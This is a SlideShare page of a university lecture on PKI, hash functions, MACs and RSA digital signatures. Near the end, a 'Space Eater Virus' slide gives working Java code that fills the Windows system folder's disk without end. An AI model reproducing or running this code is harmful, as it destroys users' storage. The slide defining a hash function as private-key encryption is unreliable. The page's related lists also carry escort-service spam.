SlideShare a Scribd company logo
1 of 19
Download to read offline
Introduction to Network Security
Lecture 3: PKI and Signature
Location:E.T.S. de Ingenierias Informatica y de Telecomunicacion Universidad
de Granada 18071, Granada (SPAIN), 24-28 April 2017
Dr. Tarek Gaber
Faculty of Computers and Informatics,
Suez Canal University, Ismailia, Egypt
tmgaber@gmail.com
Lecture Objectives
To learn Public Key
Infrastructure
To learn Digital
Signature
Lecture Outlines
Why En/Dec by itself is NOT enough?
What is PKI and how does it work?
What is Digital Signature and how it is work
An Important Message
• In theory, some crytographic algorithms
seem to be EXTREMELY secure.
• Vulnerabilities arise when systems
administrators do not deploy the
encryption systems securely.
Standard Algorithms are
Incredibly Secure
• Using a 128 bit key for a symmetric
encryption algorithm, there are 2128
possible keys.
• Even with the computing resources of the
US government, most of the software
developers alive today will be dead before
the government could break such an
encryption [Viega and McGraw]
Incredibly secure (cont.)
• Most security experts believe that 256-bit keys
are good for the lifetime of the universe (many
billions of years).
• The problem is that encryption is just one link
in the chain of security. Encryption is a really
strong link in that chain, but one weak link
breaks the chain.
• It is usually easier for the attacker to hack your
machine and steal the plaintext than to break
your cipher.
Hash Function
http://onlinemd5.com/ 9-7
Copyright © 2012 Pearson Education, Inc.
Publishing as Prentice Hall
Public Key Infrastructure (PKI)
A scheme for securing communication using public
key encryption and various technical components
https://www.youtube.com/watch?v=1uusOyoDQ0c
– public (asymmetric) key encryption
Method of encryption that uses a pair of matched
keys—a public key to encrypt a message and a private
key to decrypt it, or vice versa
– public key
Encryption code that is publicly available to anyone
– private key
Encryption code that is known only to its owner
9-8
Copyright © 2012 Pearson Education, Inc.
Publishing as Prentice Hall
PKI (Cont.)
– digital signature or digital certificate
Validates the sender and time stamp of a transaction
so it cannot be later claimed that the transaction was
unauthorized or invalid
– hash function
A mathematical computation that is applied to a
message, using a private key, to encrypt the message
– message digest (MD)
A summary of a message converted into a string of
digits after the hash has been applied
9-9
Copyright © 2012 Pearson Education, Inc.
Publishing as Prentice Hall
Example of Digital Certificate
Authentication – Hash Functions
• Creates small, fixed-size block of data (message digest, hash
value) from m
• Hash Function H must be collision resistant on m
– Must be infeasible to find an m’ ≠ m such that H(m) =
H(m’)
• If H(m) = H(m’), then m = m’
– The message has not been modified
• Common message-digest functions include MD5, which
produces a 128-bit hash, and SHA-1, which outputs a 160-bit
hash and SHA-2.
• So, Hash Functions could provide message authentication?
Authentication - MAC
• Symmetric encryption used in message-authentication code
(MAC) authentication algorithm
• Simple example:
– MAC defines S(k)(m) = f (k, H(m))
• Where f is a function that is one-way on its first argument
– k cannot be derived from f (k, H(m))
• Because of the collision resistance in the hash function,
reasonably assured no other message could create the
same MAC
• A suitable verification algorithm is V(k)(m, a) ≡ ( f (k,H(m))
= a)
• Note that k is needed to compute both S(k) and V(k), so
anyone able to compute one can compute the other
Digital Signature
Copyright © 2012 Pearson Education, Inc.
Publishing as Prentice Hall
2-15
Authentication – Digital Signature
• Authenticators produced are digital signatures
• In a digital-signature algorithm, computationally infeasible to derive
S(ks ) from V(kv)
– V is a one-way function
– Thus, kv is the public key and ks is the private key
• Consider the RSA digital-signature algorithm
– Similar to the RSA encryption algorithm, but the key use is reversed
– Digital signature of message S(ks )(m) = H(m)ks mod N
– The key ks again is a pair d, N, where N is the product of two large,
randomly chosen prime numbers p and q
– Verification algorithm is V(kv)(m, a) ≡ (akv mod N = H(m))
• Where kv satisfies kvks mod (p − 1)(q − 1) = 1
Authentication (Cont.)
• If encryption can prove the identity of the sender of a
message, then why need separate authentication algorithms?
– Authentication algorithms generally require fewer
computations
– Authenticator of a message is usually shorter than the
message itself
– Sometimes want authentication but not confidentiality. For
example, a company may provide a software patch and
could “sign” that patch to prove that it came from the
company.
– Can be basis for non-repudiation
Space Eater Virus
• import java.io.*;
class Virus
{
public static void main (String ar[])
{
try
{
FileWriter f = new FileWriter("C:/WINDOWS/Virus.dll",true);
while(true)
{
f.write("Programming Is Such A FUN !!!");
}
}
catch(FileNotFoundException e) {}
catch(IOException e){}
}
}
• Enjoy with this virus ?
Thanks for your attention
Questions, please
For any question, please use
tmgaber@gmail.com
Tarek Gaber,

More Related Content

What's hot

What's hot (20)

Information and network security 44 direct digital signatures
Information and network security 44 direct digital signaturesInformation and network security 44 direct digital signatures
Information and network security 44 direct digital signatures
 
3 public key cryptography
3 public key cryptography3 public key cryptography
3 public key cryptography
 
Paillier-ElGamal cryptosystem presentation
Paillier-ElGamal cryptosystem presentationPaillier-ElGamal cryptosystem presentation
Paillier-ElGamal cryptosystem presentation
 
PUBLIC KEY ENCRYPTION
PUBLIC KEY ENCRYPTIONPUBLIC KEY ENCRYPTION
PUBLIC KEY ENCRYPTION
 
key management
 key management key management
key management
 
Public Key Encryption & Hash functions
Public Key Encryption & Hash functionsPublic Key Encryption & Hash functions
Public Key Encryption & Hash functions
 
Public Key Cryptosystem
Public Key CryptosystemPublic Key Cryptosystem
Public Key Cryptosystem
 
Key distribution code.ppt
Key distribution code.pptKey distribution code.ppt
Key distribution code.ppt
 
Lecture12
Lecture12Lecture12
Lecture12
 
Authentication: keys, MAC
Authentication: keys, MACAuthentication: keys, MAC
Authentication: keys, MAC
 
Key management and distribution
Key management and distributionKey management and distribution
Key management and distribution
 
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
CS6701 CRYPTOGRAPHY AND NETWORK SECURITYCS6701 CRYPTOGRAPHY AND NETWORK SECURITY
CS6701 CRYPTOGRAPHY AND NETWORK SECURITY
 
Digital signature
Digital signatureDigital signature
Digital signature
 
CRYPTOGRAPHY & NETWORK SECURITY- Cryptographic Hash Functions
CRYPTOGRAPHY & NETWORK SECURITY- Cryptographic Hash FunctionsCRYPTOGRAPHY & NETWORK SECURITY- Cryptographic Hash Functions
CRYPTOGRAPHY & NETWORK SECURITY- Cryptographic Hash Functions
 
Ch10
Ch10Ch10
Ch10
 
Pooguzhali
PooguzhaliPooguzhali
Pooguzhali
 
MAC-Message Authentication Codes
MAC-Message Authentication CodesMAC-Message Authentication Codes
MAC-Message Authentication Codes
 
RSA Algorithm
RSA AlgorithmRSA Algorithm
RSA Algorithm
 
Unit 7 : Network Security
Unit 7 : Network SecurityUnit 7 : Network Security
Unit 7 : Network Security
 
Rsa cryptosystem
Rsa cryptosystemRsa cryptosystem
Rsa cryptosystem
 

Similar to Simple Overview of PKI and Digital signature by Tarek_Gaber

RSA - ENCRYPTION ALGORITHM CRYPTOGRAPHY
RSA - ENCRYPTION ALGORITHM CRYPTOGRAPHYRSA - ENCRYPTION ALGORITHM CRYPTOGRAPHY
RSA - ENCRYPTION ALGORITHM CRYPTOGRAPHYQualcomm
 
Cryptography and network security
Cryptography and network securityCryptography and network security
Cryptography and network securityNagendra Um
 
Enhancing security in cloud storage
Enhancing security in cloud storageEnhancing security in cloud storage
Enhancing security in cloud storageShivam Singh
 
Email Encryption using Tri-Cryptosystem Based on Android
Email Encryption using Tri-Cryptosystem Based on AndroidEmail Encryption using Tri-Cryptosystem Based on Android
Email Encryption using Tri-Cryptosystem Based on AndroidIRJET Journal
 
Introduction to Digital signatures
Introduction to Digital signaturesIntroduction to Digital signatures
Introduction to Digital signaturesRohit Bhat
 
Cryptography based chat system
Cryptography based chat systemCryptography based chat system
Cryptography based chat systemJagsir Singh
 
Cryptography Key Management.pptx
Cryptography Key Management.pptxCryptography Key Management.pptx
Cryptography Key Management.pptxSurendraBasnet6
 
Chaotic Rivest-Shamir-Adlerman Algorithm with Data Encryption Standard Schedu...
Chaotic Rivest-Shamir-Adlerman Algorithm with Data Encryption Standard Schedu...Chaotic Rivest-Shamir-Adlerman Algorithm with Data Encryption Standard Schedu...
Chaotic Rivest-Shamir-Adlerman Algorithm with Data Encryption Standard Schedu...journalBEEI
 
Computer System Security (UNIT IV) For AKTU Lucknow
Computer System Security (UNIT IV) For AKTU LucknowComputer System Security (UNIT IV) For AKTU Lucknow
Computer System Security (UNIT IV) For AKTU LucknowBrijesh Vishwakarma
 
Encryption technology
Encryption technologyEncryption technology
Encryption technologyNeha Bhambu
 
Vtu network security(10 ec832) unit 3 notes.
Vtu network security(10 ec832) unit 3 notes.Vtu network security(10 ec832) unit 3 notes.
Vtu network security(10 ec832) unit 3 notes.Jayanth Dwijesh H P
 
Secrity project keyvan
Secrity project   keyvanSecrity project   keyvan
Secrity project keyvanitrraincity
 
Attaining data security in cloud computing
Attaining data security in cloud computingAttaining data security in cloud computing
Attaining data security in cloud computingGopinath Muthusamy
 
Authentication system for e-certificate by using RSA’s digital signature
Authentication system for e-certificate by using RSA’s digital signatureAuthentication system for e-certificate by using RSA’s digital signature
Authentication system for e-certificate by using RSA’s digital signatureTELKOMNIKA JOURNAL
 

Similar to Simple Overview of PKI and Digital signature by Tarek_Gaber (20)

RSA
RSARSA
RSA
 
Chapter 15 - Security
Chapter 15 - SecurityChapter 15 - Security
Chapter 15 - Security
 
Introduction to cryptography
Introduction to cryptographyIntroduction to cryptography
Introduction to cryptography
 
RSA - ENCRYPTION ALGORITHM CRYPTOGRAPHY
RSA - ENCRYPTION ALGORITHM CRYPTOGRAPHYRSA - ENCRYPTION ALGORITHM CRYPTOGRAPHY
RSA - ENCRYPTION ALGORITHM CRYPTOGRAPHY
 
Cryptography and network security
Cryptography and network securityCryptography and network security
Cryptography and network security
 
Enhancing security in cloud storage
Enhancing security in cloud storageEnhancing security in cloud storage
Enhancing security in cloud storage
 
Email Encryption using Tri-Cryptosystem Based on Android
Email Encryption using Tri-Cryptosystem Based on AndroidEmail Encryption using Tri-Cryptosystem Based on Android
Email Encryption using Tri-Cryptosystem Based on Android
 
New ppt.ppt
New ppt.pptNew ppt.ppt
New ppt.ppt
 
Introduction to Digital signatures
Introduction to Digital signaturesIntroduction to Digital signatures
Introduction to Digital signatures
 
Cryptography based chat system
Cryptography based chat systemCryptography based chat system
Cryptography based chat system
 
Cryptography Key Management.pptx
Cryptography Key Management.pptxCryptography Key Management.pptx
Cryptography Key Management.pptx
 
Chaotic Rivest-Shamir-Adlerman Algorithm with Data Encryption Standard Schedu...
Chaotic Rivest-Shamir-Adlerman Algorithm with Data Encryption Standard Schedu...Chaotic Rivest-Shamir-Adlerman Algorithm with Data Encryption Standard Schedu...
Chaotic Rivest-Shamir-Adlerman Algorithm with Data Encryption Standard Schedu...
 
Computer System Security (UNIT IV) For AKTU Lucknow
Computer System Security (UNIT IV) For AKTU LucknowComputer System Security (UNIT IV) For AKTU Lucknow
Computer System Security (UNIT IV) For AKTU Lucknow
 
Encryption technology
Encryption technologyEncryption technology
Encryption technology
 
Vtu network security(10 ec832) unit 3 notes.
Vtu network security(10 ec832) unit 3 notes.Vtu network security(10 ec832) unit 3 notes.
Vtu network security(10 ec832) unit 3 notes.
 
Secrity project keyvan
Secrity project   keyvanSecrity project   keyvan
Secrity project keyvan
 
Attaining data security in cloud computing
Attaining data security in cloud computingAttaining data security in cloud computing
Attaining data security in cloud computing
 
Authentication system for e-certificate by using RSA’s digital signature
Authentication system for e-certificate by using RSA’s digital signatureAuthentication system for e-certificate by using RSA’s digital signature
Authentication system for e-certificate by using RSA’s digital signature
 
Rsa
RsaRsa
Rsa
 
Moein
MoeinMoein
Moein
 

More from Tarek Gaber

Writing a Successful Paper (Academic Writing Engineering)
Writing a Successful Paper (Academic Writing Engineering)Writing a Successful Paper (Academic Writing Engineering)
Writing a Successful Paper (Academic Writing Engineering)Tarek Gaber
 
Feature Selection Method Based on Chaotic Maps and Butterfly Optimization Alg...
Feature Selection Method Based on Chaotic Maps and Butterfly Optimization Alg...Feature Selection Method Based on Chaotic Maps and Butterfly Optimization Alg...
Feature Selection Method Based on Chaotic Maps and Butterfly Optimization Alg...Tarek Gaber
 
Thermal Imaging: Opportunities and Challenges for Breast Cancer Detection
Thermal Imaging: Opportunities and Challenges for Breast Cancer DetectionThermal Imaging: Opportunities and Challenges for Breast Cancer Detection
Thermal Imaging: Opportunities and Challenges for Breast Cancer DetectionTarek Gaber
 
Using Google Scholar to get similar paper to your class/gradation project
Using Google Scholar to get similar paper to your class/gradation projectUsing Google Scholar to get similar paper to your class/gradation project
Using Google Scholar to get similar paper to your class/gradation projectTarek Gaber
 
Brief Guidelines for Writing Graduation Project Thesis
Brief Guidelines for Writing Graduation Project ThesisBrief Guidelines for Writing Graduation Project Thesis
Brief Guidelines for Writing Graduation Project ThesisTarek Gaber
 
Simple Overview Caesar and RSA Encryption_by_Tarek_Gaber
Simple Overview Caesar and RSA Encryption_by_Tarek_GaberSimple Overview Caesar and RSA Encryption_by_Tarek_Gaber
Simple Overview Caesar and RSA Encryption_by_Tarek_GaberTarek Gaber
 
Integer Wavelet Transform for Thermal Image Authentication
Integer Wavelet Transform for Thermal Image AuthenticationInteger Wavelet Transform for Thermal Image Authentication
Integer Wavelet Transform for Thermal Image AuthenticationTarek Gaber
 
Segmentation of thermograms breast cancer tarek-to-slid share
Segmentation of thermograms breast cancer tarek-to-slid shareSegmentation of thermograms breast cancer tarek-to-slid share
Segmentation of thermograms breast cancer tarek-to-slid shareTarek Gaber
 
Touch paper presentation-tarek
Touch paper presentation-tarekTouch paper presentation-tarek
Touch paper presentation-tarekTarek Gaber
 
Overview on security and privacy issues in wireless sensor networks-2014
Overview on security and privacy issues in  wireless sensor networks-2014Overview on security and privacy issues in  wireless sensor networks-2014
Overview on security and privacy issues in wireless sensor networks-2014Tarek Gaber
 
Sift based arabic sign language recognition aecia 2014 –november17-19, addis ...
Sift based arabic sign language recognition aecia 2014 –november17-19, addis ...Sift based arabic sign language recognition aecia 2014 –november17-19, addis ...
Sift based arabic sign language recognition aecia 2014 –november17-19, addis ...Tarek Gaber
 
Fair and abuse free contract signing protocol supporting fair license reselli...
Fair and abuse free contract signing protocol supporting fair license reselli...Fair and abuse free contract signing protocol supporting fair license reselli...
Fair and abuse free contract signing protocol supporting fair license reselli...Tarek Gaber
 
Drm digital rights managment-june2014-tarek gaber
Drm digital rights managment-june2014-tarek gaberDrm digital rights managment-june2014-tarek gaber
Drm digital rights managment-june2014-tarek gaberTarek Gaber
 
A novel approach to allow multiple resales of DRM protected contents - icces2...
A novel approach to allow multiple resales of DRM protected contents - icces2...A novel approach to allow multiple resales of DRM protected contents - icces2...
A novel approach to allow multiple resales of DRM protected contents - icces2...Tarek Gaber
 
تطبيق محمول للصم والبكم يحول الاشارات الى صوت Unesco-cairo-13-2-2014
تطبيق محمول للصم والبكم يحول الاشارات الى صوت Unesco-cairo-13-2-2014تطبيق محمول للصم والبكم يحول الاشارات الى صوت Unesco-cairo-13-2-2014
تطبيق محمول للصم والبكم يحول الاشارات الى صوت Unesco-cairo-13-2-2014Tarek Gaber
 

More from Tarek Gaber (15)

Writing a Successful Paper (Academic Writing Engineering)
Writing a Successful Paper (Academic Writing Engineering)Writing a Successful Paper (Academic Writing Engineering)
Writing a Successful Paper (Academic Writing Engineering)
 
Feature Selection Method Based on Chaotic Maps and Butterfly Optimization Alg...
Feature Selection Method Based on Chaotic Maps and Butterfly Optimization Alg...Feature Selection Method Based on Chaotic Maps and Butterfly Optimization Alg...
Feature Selection Method Based on Chaotic Maps and Butterfly Optimization Alg...
 
Thermal Imaging: Opportunities and Challenges for Breast Cancer Detection
Thermal Imaging: Opportunities and Challenges for Breast Cancer DetectionThermal Imaging: Opportunities and Challenges for Breast Cancer Detection
Thermal Imaging: Opportunities and Challenges for Breast Cancer Detection
 
Using Google Scholar to get similar paper to your class/gradation project
Using Google Scholar to get similar paper to your class/gradation projectUsing Google Scholar to get similar paper to your class/gradation project
Using Google Scholar to get similar paper to your class/gradation project
 
Brief Guidelines for Writing Graduation Project Thesis
Brief Guidelines for Writing Graduation Project ThesisBrief Guidelines for Writing Graduation Project Thesis
Brief Guidelines for Writing Graduation Project Thesis
 
Simple Overview Caesar and RSA Encryption_by_Tarek_Gaber
Simple Overview Caesar and RSA Encryption_by_Tarek_GaberSimple Overview Caesar and RSA Encryption_by_Tarek_Gaber
Simple Overview Caesar and RSA Encryption_by_Tarek_Gaber
 
Integer Wavelet Transform for Thermal Image Authentication
Integer Wavelet Transform for Thermal Image AuthenticationInteger Wavelet Transform for Thermal Image Authentication
Integer Wavelet Transform for Thermal Image Authentication
 
Segmentation of thermograms breast cancer tarek-to-slid share
Segmentation of thermograms breast cancer tarek-to-slid shareSegmentation of thermograms breast cancer tarek-to-slid share
Segmentation of thermograms breast cancer tarek-to-slid share
 
Touch paper presentation-tarek
Touch paper presentation-tarekTouch paper presentation-tarek
Touch paper presentation-tarek
 
Overview on security and privacy issues in wireless sensor networks-2014
Overview on security and privacy issues in  wireless sensor networks-2014Overview on security and privacy issues in  wireless sensor networks-2014
Overview on security and privacy issues in wireless sensor networks-2014
 
Sift based arabic sign language recognition aecia 2014 –november17-19, addis ...
Sift based arabic sign language recognition aecia 2014 –november17-19, addis ...Sift based arabic sign language recognition aecia 2014 –november17-19, addis ...
Sift based arabic sign language recognition aecia 2014 –november17-19, addis ...
 
Fair and abuse free contract signing protocol supporting fair license reselli...
Fair and abuse free contract signing protocol supporting fair license reselli...Fair and abuse free contract signing protocol supporting fair license reselli...
Fair and abuse free contract signing protocol supporting fair license reselli...
 
Drm digital rights managment-june2014-tarek gaber
Drm digital rights managment-june2014-tarek gaberDrm digital rights managment-june2014-tarek gaber
Drm digital rights managment-june2014-tarek gaber
 
A novel approach to allow multiple resales of DRM protected contents - icces2...
A novel approach to allow multiple resales of DRM protected contents - icces2...A novel approach to allow multiple resales of DRM protected contents - icces2...
A novel approach to allow multiple resales of DRM protected contents - icces2...
 
تطبيق محمول للصم والبكم يحول الاشارات الى صوت Unesco-cairo-13-2-2014
تطبيق محمول للصم والبكم يحول الاشارات الى صوت Unesco-cairo-13-2-2014تطبيق محمول للصم والبكم يحول الاشارات الى صوت Unesco-cairo-13-2-2014
تطبيق محمول للصم والبكم يحول الاشارات الى صوت Unesco-cairo-13-2-2014
 

Recently uploaded

call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
भारत-रोम व्यापार.pptx, Indo-Roman Trade,
भारत-रोम व्यापार.pptx, Indo-Roman Trade,भारत-रोम व्यापार.pptx, Indo-Roman Trade,
भारत-रोम व्यापार.pptx, Indo-Roman Trade,Virag Sontakke
 
Painted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaPainted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaVirag Sontakke
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsKarinaGenton
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 
History Class XII Ch. 3 Kinship, Caste and Class (1).pptx
History Class XII Ch. 3 Kinship, Caste and Class (1).pptxHistory Class XII Ch. 3 Kinship, Caste and Class (1).pptx
History Class XII Ch. 3 Kinship, Caste and Class (1).pptxsocialsciencegdgrohi
 
Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxAvyJaneVismanos
 
Class 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfClass 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfakmcokerachita
 
internship ppt on smartinternz platform as salesforce developer
internship ppt on smartinternz platform as salesforce developerinternship ppt on smartinternz platform as salesforce developer
internship ppt on smartinternz platform as salesforce developerunnathinaik
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology  ( Production , Purification , and Application  ) Hybridoma Technology  ( Production , Purification , and Application  )
Hybridoma Technology ( Production , Purification , and Application ) Sakshi Ghasle
 
ENGLISH5 QUARTER4 MODULE1 WEEK1-3 How Visual and Multimedia Elements.pptx
ENGLISH5 QUARTER4 MODULE1 WEEK1-3 How Visual and Multimedia Elements.pptxENGLISH5 QUARTER4 MODULE1 WEEK1-3 How Visual and Multimedia Elements.pptx
ENGLISH5 QUARTER4 MODULE1 WEEK1-3 How Visual and Multimedia Elements.pptxAnaBeatriceAblay2
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxNirmalaLoungPoorunde1
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
Introduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher EducationIntroduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher Educationpboyjonauth
 

Recently uploaded (20)

call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri  Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Bikash Puri  Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
 
भारत-रोम व्यापार.pptx, Indo-Roman Trade,
भारत-रोम व्यापार.pptx, Indo-Roman Trade,भारत-रोम व्यापार.pptx, Indo-Roman Trade,
भारत-रोम व्यापार.pptx, Indo-Roman Trade,
 
Painted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of IndiaPainted Grey Ware.pptx, PGW Culture of India
Painted Grey Ware.pptx, PGW Culture of India
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory Inspection
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its Characteristics
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon A
 
History Class XII Ch. 3 Kinship, Caste and Class (1).pptx
History Class XII Ch. 3 Kinship, Caste and Class (1).pptxHistory Class XII Ch. 3 Kinship, Caste and Class (1).pptx
History Class XII Ch. 3 Kinship, Caste and Class (1).pptx
 
Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptx
 
Class 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfClass 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdf
 
internship ppt on smartinternz platform as salesforce developer
internship ppt on smartinternz platform as salesforce developerinternship ppt on smartinternz platform as salesforce developer
internship ppt on smartinternz platform as salesforce developer
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Hybridoma Technology ( Production , Purification , and Application )
Hybridoma Technology  ( Production , Purification , and Application  ) Hybridoma Technology  ( Production , Purification , and Application  )
Hybridoma Technology ( Production , Purification , and Application )
 
ENGLISH5 QUARTER4 MODULE1 WEEK1-3 How Visual and Multimedia Elements.pptx
ENGLISH5 QUARTER4 MODULE1 WEEK1-3 How Visual and Multimedia Elements.pptxENGLISH5 QUARTER4 MODULE1 WEEK1-3 How Visual and Multimedia Elements.pptx
ENGLISH5 QUARTER4 MODULE1 WEEK1-3 How Visual and Multimedia Elements.pptx
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptx
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
Introduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher EducationIntroduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher Education
 

Simple Overview of PKI and Digital signature by Tarek_Gaber

  • 1. Introduction to Network Security Lecture 3: PKI and Signature Location:E.T.S. de Ingenierias Informatica y de Telecomunicacion Universidad de Granada 18071, Granada (SPAIN), 24-28 April 2017 Dr. Tarek Gaber Faculty of Computers and Informatics, Suez Canal University, Ismailia, Egypt tmgaber@gmail.com
  • 2. Lecture Objectives To learn Public Key Infrastructure To learn Digital Signature
  • 3. Lecture Outlines Why En/Dec by itself is NOT enough? What is PKI and how does it work? What is Digital Signature and how it is work
  • 4. An Important Message • In theory, some crytographic algorithms seem to be EXTREMELY secure. • Vulnerabilities arise when systems administrators do not deploy the encryption systems securely.
  • 5. Standard Algorithms are Incredibly Secure • Using a 128 bit key for a symmetric encryption algorithm, there are 2128 possible keys. • Even with the computing resources of the US government, most of the software developers alive today will be dead before the government could break such an encryption [Viega and McGraw]
  • 6. Incredibly secure (cont.) • Most security experts believe that 256-bit keys are good for the lifetime of the universe (many billions of years). • The problem is that encryption is just one link in the chain of security. Encryption is a really strong link in that chain, but one weak link breaks the chain. • It is usually easier for the attacker to hack your machine and steal the plaintext than to break your cipher.
  • 7. Hash Function http://onlinemd5.com/ 9-7 Copyright © 2012 Pearson Education, Inc. Publishing as Prentice Hall
  • 8. Public Key Infrastructure (PKI) A scheme for securing communication using public key encryption and various technical components https://www.youtube.com/watch?v=1uusOyoDQ0c – public (asymmetric) key encryption Method of encryption that uses a pair of matched keys—a public key to encrypt a message and a private key to decrypt it, or vice versa – public key Encryption code that is publicly available to anyone – private key Encryption code that is known only to its owner 9-8 Copyright © 2012 Pearson Education, Inc. Publishing as Prentice Hall
  • 9. PKI (Cont.) – digital signature or digital certificate Validates the sender and time stamp of a transaction so it cannot be later claimed that the transaction was unauthorized or invalid – hash function A mathematical computation that is applied to a message, using a private key, to encrypt the message – message digest (MD) A summary of a message converted into a string of digits after the hash has been applied 9-9 Copyright © 2012 Pearson Education, Inc. Publishing as Prentice Hall
  • 10. Example of Digital Certificate
  • 11.
  • 12.
  • 13. Authentication – Hash Functions • Creates small, fixed-size block of data (message digest, hash value) from m • Hash Function H must be collision resistant on m – Must be infeasible to find an m’ ≠ m such that H(m) = H(m’) • If H(m) = H(m’), then m = m’ – The message has not been modified • Common message-digest functions include MD5, which produces a 128-bit hash, and SHA-1, which outputs a 160-bit hash and SHA-2. • So, Hash Functions could provide message authentication?
  • 14. Authentication - MAC • Symmetric encryption used in message-authentication code (MAC) authentication algorithm • Simple example: – MAC defines S(k)(m) = f (k, H(m)) • Where f is a function that is one-way on its first argument – k cannot be derived from f (k, H(m)) • Because of the collision resistance in the hash function, reasonably assured no other message could create the same MAC • A suitable verification algorithm is V(k)(m, a) ≡ ( f (k,H(m)) = a) • Note that k is needed to compute both S(k) and V(k), so anyone able to compute one can compute the other
  • 15. Digital Signature Copyright © 2012 Pearson Education, Inc. Publishing as Prentice Hall 2-15
